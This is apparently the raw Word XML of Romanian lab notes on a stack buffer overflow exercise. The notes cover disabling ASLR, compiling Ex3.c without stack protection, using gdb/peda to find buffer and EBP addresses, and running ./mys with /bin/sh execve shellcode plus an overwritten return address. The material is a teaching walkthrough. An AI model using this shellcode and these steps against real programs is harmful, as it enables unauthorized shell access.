          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Instalăm </w:t>
      </w:r>
      <w:r w:rsidR="008D6771" w:rsidRPr="009D3FBA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>peda</w:t>
      </w:r>
      <w:r w:rsidR="008D6771">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (plugin </w:t>
      </w:r>
      <w:r w:rsidR="008D6771" w:rsidRPr="009D3FBA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:r w:rsidR="008D6771">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) → mai multe informații pentru fiecare instrucțiune din cod (adrese pentru regiștrii):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7560A68C" w14:textId="77777777" w:rsidR="00E96BBD" w:rsidRDefault="00E96BBD" w:rsidP="008D6771">
      <w:pPr>
        <w:ind w:left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96B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 clone https://github.com/longld/peda.git ~/peda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7970DE07" w14:textId="7A02BB22" w:rsidR="00E96BBD" w:rsidRDefault="00E96BBD" w:rsidP="008D6771">
      <w:pPr>
        <w:ind w:left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96B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echo "source ~/peda/peda.py" &gt;&gt; ~/.gdbinit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5784678F" w14:textId="00A1E0BE" w:rsidR="00531364" w:rsidRDefault="00E96BBD" w:rsidP="00E96BB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96B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apt install gdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23503040" w14:textId="11E3496C" w:rsidR="002A1622" w:rsidRDefault="002A1622" w:rsidP="00D347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Pași pentru atacul de </w:t>
      </w:r>
      <w:r w:rsidRPr="00B21DAD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>buffer overflow</w:t>
      </w:r>
      <w:r w:rsidR="008D6771">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (pregătim 2 terminale)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BCBC48" w14:textId="1BEF295D" w:rsidR="008D6771" w:rsidRPr="007D53BB" w:rsidRDefault="008D6771" w:rsidP="00D347A9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</w:pPr>
      <w:r w:rsidRPr="007D53BB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[T1]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2173AB" w14:textId="5E819E2D" w:rsidR="00A9381D" w:rsidRDefault="00A9381D" w:rsidP="00D347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15F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echo 0 | sudo tee /proc/sys/kernel/randomize_va_space</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  → dezactivează ASLR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9E10B2" w14:textId="25F376C5" w:rsidR="00A9381D" w:rsidRPr="00ED5125" w:rsidRDefault="00A9381D" w:rsidP="00D347A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D51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mys Ex3.c -z execstack -fno-stack-protector -g -O0 -m32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08201B77" w14:textId="34245249" w:rsidR="00A9381D" w:rsidRDefault="00CB1730" w:rsidP="00ED51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173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D5125" w:rsidRPr="00CB173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ED5125">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: output → fișierul de ieșire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D799A7F" w14:textId="1C14DB3D" w:rsidR="00ED5125" w:rsidRDefault="00CB1730" w:rsidP="00ED51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1730">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-z execstack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keyword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> specific): </w:t>
      </w:r>
      <w:r w:rsidR="006B61EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oferă drepturi executabile pentru stivă → avem nevoie de asta pentru că buffer-ul nostru va fi pe stivă și vrem să executăm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B7B64" w14:textId="2AAC96FD" w:rsidR="006B61EA" w:rsidRDefault="006B61EA" w:rsidP="00ED51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-O0</w:t>
      </w:r>
      <w:r w:rsidRPr="006B61EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00295A05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dezactivează optimizarea de la compilator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D78F4B9" w14:textId="61173F3E" w:rsidR="004E4CC6" w:rsidRDefault="004E4CC6" w:rsidP="00ED51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CC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-fno-stack-protector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: dezactivează protectorul pentru stivă</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E21F90" w14:textId="6E8F7D09" w:rsidR="004E4CC6" w:rsidRDefault="004E4CC6" w:rsidP="00ED51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CC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-m32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: compilare pentru arhitectura de 32bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BCAFE5" w14:textId="00571BDD" w:rsidR="00DB13F6" w:rsidRDefault="00DB13F6" w:rsidP="00ED51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709C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-g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2709C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>obținem informații de la compilator legate de debugging chiar în fișierul executabil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5267EC82" w14:textId="67B08A35" w:rsidR="00E43352" w:rsidRDefault="00E43352" w:rsidP="00E4335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433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./mys $(python2 -c 'print ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" +"A"*7)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB2F242" w14:textId="77777777" w:rsidR="00AA5269" w:rsidRPr="00E43352" w:rsidRDefault="00AA5269" w:rsidP="00E4335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CD8C230" w14:textId="77777777" w:rsidR="00531364" w:rsidRDefault="00531364" w:rsidP="00D347A9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</w:pPr>
    </w:p>
    <w:p w14:paraId="4FC9B347" w14:textId="0FC67DE7" w:rsidR="007D53BB" w:rsidRPr="007D53BB" w:rsidRDefault="007D53BB" w:rsidP="00D347A9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</w:pPr>
      <w:r w:rsidRPr="007D53BB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lastRenderedPageBreak/>
        <w:t>[T2]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7932D1BF" w14:textId="3D293A99" w:rsidR="00531364" w:rsidRDefault="00531364" w:rsidP="00D347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13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ps -e | grep mys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> → obținem PID-ul procesului</w:t>
      </w:r>
      <w:r w:rsidR="001D0B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1716)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1364B7" w14:textId="0FC236AD" w:rsidR="001A0D77" w:rsidRDefault="001A0D77" w:rsidP="00D347A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A0D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sudo gdb attach </w:t>
      </w:r>
      <w:r w:rsidRPr="001A0D7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PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EF201D" w14:textId="07C5F79D" w:rsidR="005A7AFD" w:rsidRPr="00273289" w:rsidRDefault="005A7AFD" w:rsidP="00D347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break Ex3.c:15</w:t>
      </w:r>
      <w:r w:rsidR="00195EF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195EFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">→ linia 15 e cea cu </w:t>
      </w:r>
      <w:r w:rsidR="00195EFD" w:rsidRPr="00195EFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:r w:rsidR="00273289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (punem breakpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F07AB08" w14:textId="51F1AC0D" w:rsidR="005A7AFD" w:rsidRDefault="00273289" w:rsidP="00273289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continue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>→ continuăm debugger-ul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6ABD80" w14:textId="629531C4" w:rsidR="00273289" w:rsidRDefault="00273289" w:rsidP="002732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 &amp;buffer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>→ print adresa buffer-ului</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A3218B" w14:textId="71B9D66C" w:rsidR="00273289" w:rsidRDefault="00273289" w:rsidP="0027328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info frame </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>→ info legate de EBP etc... (simulăm GDB-PEDA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0163DB15" w14:textId="0322CF5C" w:rsidR="001D0B4C" w:rsidRPr="00273289" w:rsidRDefault="001D0B4C" w:rsidP="001D0B4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D0B4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6979B49E" wp14:editId="123B5006">
            <wp:extent cx="5760720" cy="14071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8E45" w14:textId="0B04603F" w:rsidR="001E1F79" w:rsidRDefault="001E1F79" w:rsidP="00D347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B8391" wp14:editId="6E50C1AB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4891405</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1779270</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="349250" cy="19050"/>
                <wp:effectExtent l="38100" t="5715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4212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85.15pt;margin-top:140.1pt;width:27.5pt;height:1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797F5" wp14:editId="0DFA6826">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3938905</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1093470</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="349250" cy="19050"/>
                <wp:effectExtent l="38100" t="5715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274A5" id="Straight Arrow Connector 18" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:310.15pt;margin-top:86.1pt;width:27.5pt;height:1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" strokecolor="red" strokeweight="1.5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005A0F03">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15AF9357" wp14:editId="1F326400">
            <wp:extent cx="5760720" cy="1926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BB69" w14:textId="1336A092" w:rsidR="002A1622" w:rsidRDefault="001E1F79" w:rsidP="00D347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cazul meu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BAC167" w14:textId="13AF1D62" w:rsidR="001E1F79" w:rsidRDefault="001E1F79" w:rsidP="001E1F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buffer: </w:t>
      </w:r>
      <w:r w:rsidR="005A0F03" w:rsidRPr="005A0F03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0xffffd070</w:t>
      </w:r>
      <w:r w:rsidR="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:r w:rsidR="00732523" w:rsidRPr="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidR="005A0F03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00732523" w:rsidRPr="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\xd</w:t>
      </w:r>
      <w:r w:rsidR="00732523" w:rsidRPr="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\xff\xff</w:t>
      </w:r>
      <w:r w:rsidR="00732523" w:rsidRPr="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8733BB" w14:textId="09C515A5" w:rsidR="001E1F79" w:rsidRPr="001E1F79" w:rsidRDefault="001E1F79" w:rsidP="001E1F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EBP: </w:t>
      </w:r>
      <w:r w:rsidR="005A0F03" w:rsidRPr="005A0F03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0xffffd098</w:t>
      </w:r>
      <w:r w:rsidR="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:r w:rsidR="00732523" w:rsidRPr="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidR="005A0F03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8\xd</w:t>
      </w:r>
      <w:r w:rsidR="00732523" w:rsidRPr="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\xff\xff</w:t>
      </w:r>
      <w:r w:rsidR="00732523" w:rsidRPr="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117A1349" w14:textId="03689448" w:rsidR="001E1F79" w:rsidRDefault="001E1F79" w:rsidP="00D347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Diferența este de 28 hexa</w:t>
      </w:r>
      <w:r w:rsidR="00861EF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, deci 40 bytes. 40-32(ai noștri din buffer)=8=EDI+EDS (regiștrii).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284B1C43" w14:textId="7363801C" w:rsidR="00AB0D70" w:rsidRPr="00E43352" w:rsidRDefault="00732523" w:rsidP="00AB0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Comandă nouă: </w:t>
      </w:r>
      <w:r w:rsidR="00AB0D70" w:rsidRPr="00E433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./mys $(python2 -c 'print ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</w:t>
      </w:r>
      <w:r w:rsidR="00AB0D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B0D70" w:rsidRPr="00E433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+</w:t>
      </w:r>
      <w:r w:rsidR="00AB0D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B0D70" w:rsidRPr="00E433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"A"*7</w:t>
      </w:r>
      <w:r w:rsidR="00AB0D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B0D70" w:rsidRPr="00AB0D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+</w:t>
      </w:r>
      <w:r w:rsidR="00AB0D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B0D70" w:rsidRPr="00AB0D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"A"*8 +</w:t>
      </w:r>
      <w:r w:rsidR="00AB0D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B0D70" w:rsidRPr="00AB0D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"\x</w:t>
      </w:r>
      <w:r w:rsidR="005A0F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9</w:t>
      </w:r>
      <w:r w:rsidR="00AB0D70" w:rsidRPr="00AB0D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8\xd0\xff\xff"</w:t>
      </w:r>
      <w:r w:rsidR="00AB0D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+ </w:t>
      </w:r>
      <w:r w:rsidR="00AB0D70" w:rsidRPr="00AB0D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"\x</w:t>
      </w:r>
      <w:r w:rsidR="005A0F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7</w:t>
      </w:r>
      <w:r w:rsidR="00AB0D70" w:rsidRPr="00AB0D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0\xd0\xff\xff"</w:t>
      </w:r>
      <w:r w:rsidR="00AB0D70" w:rsidRPr="00E433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)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C45EE4" w14:textId="77777777" w:rsidR="00091C2A" w:rsidRDefault="00091C2A" w:rsidP="00D347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065FF" w14:textId="7C170641" w:rsidR="00732523" w:rsidRDefault="00091C2A" w:rsidP="00D347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Refacem comenzile anterioare:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37554166" w14:textId="77777777" w:rsidR="0018151C" w:rsidRPr="007D53BB" w:rsidRDefault="0018151C" w:rsidP="0018151C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</w:pPr>
      <w:r w:rsidRPr="007D53BB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[T1]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBAB8A0" w14:textId="77777777" w:rsidR="0018151C" w:rsidRDefault="0018151C" w:rsidP="001815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15F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echo 0 | sudo tee /proc/sys/kernel/randomize_va_space</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  → dezactivează ASLR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0249B269" w14:textId="77777777" w:rsidR="0018151C" w:rsidRPr="00ED5125" w:rsidRDefault="0018151C" w:rsidP="0018151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D51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-o mys Ex3.c -z execstack -fno-stack-protector -g -O0 -m32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E3D769" w14:textId="42E2ED88" w:rsidR="0018151C" w:rsidRPr="00E43352" w:rsidRDefault="0018151C" w:rsidP="001815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433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./mys $(python2 -c 'print ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"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433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+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433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"A"*7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B0D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+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B0D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"A"*8 +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B0D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"\x</w:t>
      </w:r>
      <w:r w:rsidR="005A0F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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0D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8\xd0\xff\xff"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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0D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"\x</w:t>
      </w:r>
      <w:r w:rsidR="005A0F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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0D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0\xd0\xff\xff"</w:t>
      </w:r>
      <w:r w:rsidRPr="00E433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)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DE95E1" w14:textId="77777777" w:rsidR="00E23B96" w:rsidRDefault="00E23B96" w:rsidP="0018151C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</w:pPr>
    </w:p>
    <w:p w14:paraId="324234CE" w14:textId="279979B3" w:rsidR="0018151C" w:rsidRPr="007D53BB" w:rsidRDefault="0018151C" w:rsidP="0018151C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</w:pPr>
      <w:r w:rsidRPr="007D53BB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[T2]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F0902A" w14:textId="77777777" w:rsidR="0018151C" w:rsidRDefault="0018151C" w:rsidP="001815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13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ps -e | grep mys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> → obținem PID-ul procesului (1716)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D7601F" w14:textId="77777777" w:rsidR="0018151C" w:rsidRDefault="0018151C" w:rsidP="0018151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A0D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sudo gdb attach </w:t>
      </w:r>
      <w:r w:rsidRPr="001A0D7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PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8F35F7" w14:textId="77777777" w:rsidR="0018151C" w:rsidRPr="00273289" w:rsidRDefault="0018151C" w:rsidP="001815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break Ex3.c:15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">→ linia 15 e cea cu </w:t>
      </w:r>
      <w:r w:rsidRPr="00195EFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (punem breakpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D16211E" w14:textId="77777777" w:rsidR="0018151C" w:rsidRDefault="0018151C" w:rsidP="0018151C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continue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>→ continuăm debugger-ul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35015451" w14:textId="77777777" w:rsidR="0018151C" w:rsidRDefault="0018151C" w:rsidP="0018151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 &amp;buffer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>→ print adresa buffer-ului</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A57DA0F" w14:textId="353D5132" w:rsidR="0018151C" w:rsidRDefault="0018151C" w:rsidP="0018151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info frame </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>→ info legate de EBP etc... (simulăm GDB-PEDA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354B3FF5" w14:textId="5AA2515B" w:rsidR="00E23B96" w:rsidRDefault="00E23B96" w:rsidP="00D347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Obținem:</w:t>
      </w:r>
    </w:p>
